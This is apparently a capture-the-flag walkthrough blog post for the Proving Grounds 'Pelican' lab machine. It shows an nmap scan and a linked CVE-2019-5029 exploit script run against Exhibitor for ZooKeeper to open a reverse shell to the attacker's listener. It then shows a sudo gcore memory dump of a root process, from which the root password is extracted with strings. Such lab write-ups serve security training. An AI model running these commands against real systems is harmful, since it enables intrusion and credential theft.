PG - Pelican

PG – Pelican

In this walk through, we will be going through the Pelican room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of Exhibitor for Zookeeper using CVE-2019-5029 to get the initial access. For the privilege escalation, abuse of the gcore binary sudo misconfiguration is required to get root. So, let’s get started without any delay.

Pelican

Machine Info:

TitlePelican
IPaddress192.168.157.98
DifficultyIntermediate
OSLinux
DescriptionPelican is an Intermediate Linux machine that is vulnerable to CVE-2019-5029 and requires its exploitation for the initial foothold. For the privilege escalation, attacker have to abuse the gcore binary sudo misconfiguration to get root.

Enumeration:

  • I started off with a regular aggressive nmap scan and found multiple ports opened – 22 (SSH), 139,445 (Samba), 631 (IPP), 2222 (SSH) and 8080 (HTTP).

$ sudo nmap -A 192.168.157.98
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-17 23:07 IST

Nmap scan report for 192.168.157.98
Host is up (0.21s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.9p1: 
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	CVE-2019-16905	4.4	https://vulners.com/cve/CVE-2019-16905
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|_    	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
53/tcp   filtered domain
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp  open     ipp         CUPS 2.2
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
|_http-title: Forbidden - CUPS v2.2.10
| vulners: 
|   cpe:/a:apple:cups:2.2: 
|     	CVE-2022-26691	7.2	https://vulners.com/cve/CVE-2022-26691
|     	PRION:CVE-2017-18190	5.0	https://vulners.com/prion/PRION:CVE-2017-18190
|     	CVE-2017-18190	5.0	https://vulners.com/cve/CVE-2017-18190
|     	PRION:CVE-2018-4300	4.3	https://vulners.com/prion/PRION:CVE-2018-4300
|     	CVE-2018-4300	4.3	https://vulners.com/cve/CVE-2018-4300
|     	PRION:CVE-2022-26691	4.0	https://vulners.com/prion/PRION:CVE-2022-26691
|     	PRION:CVE-2023-4504	3.7	https://vulners.com/prion/PRION:CVE-2023-4504
|     	CHAINGUARD:CVE-2023-4504	3.7	https://vulners.com/cgr/CHAINGUARD:CVE-2023-4504
|     	PRION:CVE-2017-18248	3.5	https://vulners.com/prion/PRION:CVE-2017-18248
|     	CVE-2017-18248	3.5	https://vulners.com/cve/CVE-2017-18248
|     	PRION:CVE-2023-34241	3.2	https://vulners.com/prion/PRION:CVE-2023-34241
|     	PRION:CVE-2023-32324	1.9	https://vulners.com/prion/PRION:CVE-2023-32324
|     	CHAINGUARD:CVE-2023-32324	1.9	https://vulners.com/cgr/CHAINGUARD:CVE-2023-32324
|     	PRION:CVE-2021-25317	1.7	https://vulners.com/prion/PRION:CVE-2021-25317
|_    	1337DAY-ID-30905	0.0	https://vulners.com/zdt/1337DAY-ID-30905	*EXPLOIT*
2222/tcp open     ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.9p1: 
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	CVE-2019-16905	4.4	https://vulners.com/cve/CVE-2019-16905
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|_    	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
8080/tcp open     http        Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
| vulners: 
|   cpe:/a:mortbay:jetty:1.0: 
|     	SSV:26121	7.8	https://vulners.com/seebug/SSV:26121	*EXPLOIT*
|     	PRION:CVE-2007-5614	7.5	https://vulners.com/prion/PRION:CVE-2007-5614
|     	PRION:CVE-2011-4461	5.0	https://vulners.com/prion/PRION:CVE-2011-4461
|     	PRION:CVE-2009-1523	5.0	https://vulners.com/prion/PRION:CVE-2009-1523
|     	CVE-2011-4461	5.0	https://vulners.com/cve/CVE-2011-4461
|     	CVE-2009-1523	5.0	https://vulners.com/cve/CVE-2009-1523
|     	CVE-2005-3747	5.0	https://vulners.com/cve/CVE-2005-3747
|     	PRION:CVE-2009-1524	4.3	https://vulners.com/prion/PRION:CVE-2009-1524
|     	PRION:CVE-2007-5613	4.3	https://vulners.com/prion/PRION:CVE-2007-5613
|_    	CVE-2009-1524	4.3	https://vulners.com/cve/CVE-2009-1524
8081/tcp open     http        nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.157.98:8080/exhibitor/v1/ui/index.html
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/17%OT=22%CT=1%CU=35697%PV=Y%DS=4%DC=T%G=Y%TM=65A810A
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10E%TI=Z%II=I%TS=A)OPS(O1=M5
OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O
OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D
OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=E46
OS:3%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: pelican
|   NetBIOS computer name: PELICAN\x00
|   Domain name: \x00
|   FQDN: pelican
|_  System time: 2024-01-17T12:38:32-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-01-17T17:38:35
|_  start_date: N/A

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   200.59 ms 192.168.45.1
2   200.65 ms 192.168.45.254
3   201.28 ms 192.168.251.1
4   201.41 ms 192.168.157.98

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

nmap scan

nmap scan

nmap scan

  • Started my enumeration with running Samba service using smbclient. Found nothing, worth exploring.

smbclient -L 192.168.157.98

SMB Enumeration

  • Next, accessed the web server on port 8080 and found “Exhibitor for Zookeeper” running.

HTTP Error 404

Exhibitor for ZooKeeper

Exhibitor for ZooKeeper Config

Initial Access:

  • Looked for any known exploits for the running Exhibitor service and found out that it is vulnerable to CVE-2019-5029 which is a OS Command Injection vulnerability in Exhibitor supervisor for Apache Zookeeper.

CVE-2019-5029

  • Used the below exploit on the target specifying the target host and port and our listening port and IP. Once the execution is complete, we will be granted with a reverse shell connection.

Exploit: https://github.com/thehunt1s0n/Exihibitor-RCE

./exploit.sh 192.168.157.98 8080 192.168.45.234 4444

firing the exploit

got initial access

  • Captured the local flag from user charles home directory.

local flag

Privilege Escalation:

  • Next, looked for any sudo misconfiguration using the below command and found out that we can run the gcore binary as root without any password.

sudo -l

sudo -l

  • Used the GTFObins exploit for the binary to elevate our privileges. In order for the exploit to work. We first have to get a process ID running as root which we can abuse.

gcore GTFObins exploit

  • Got the process ID for password-store binary that is running as root.

ps aux

ps aux

  • Next, used the gcore binary with sudo and redirect the output of the process it to an outfile.

sudo /usr/bin/gcore -a -o /home/charles/output 8279

using the gcore binary

  • Looking into the contents of the output file using strings reveals the password for the user root.

strings output.8279

root password found

  • Switched the user to root and captured the root flag to mark the machine as complete.

got root

proof fag

Also Read: PG – Monitoring

Conclusion:

Conclusion

So that was “Pelican” for you. We started off with a regular nmap scan and found multiple ports opened – 22 (SSH), 139,445 (Samba), 631 (IPP), 2222 (SSH) and 8080 (HTTP). Enumerated the web server on port 8080 and found “Exhibitor for Zookeeper” running. Looked online for any known exploit related to it and found that is vulnerable to CVE-2019-5029. Used the same to get initial access on the target. For the privilege escalation, abused the gcore binary sudo misconfiguration using GTFObins exploit to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top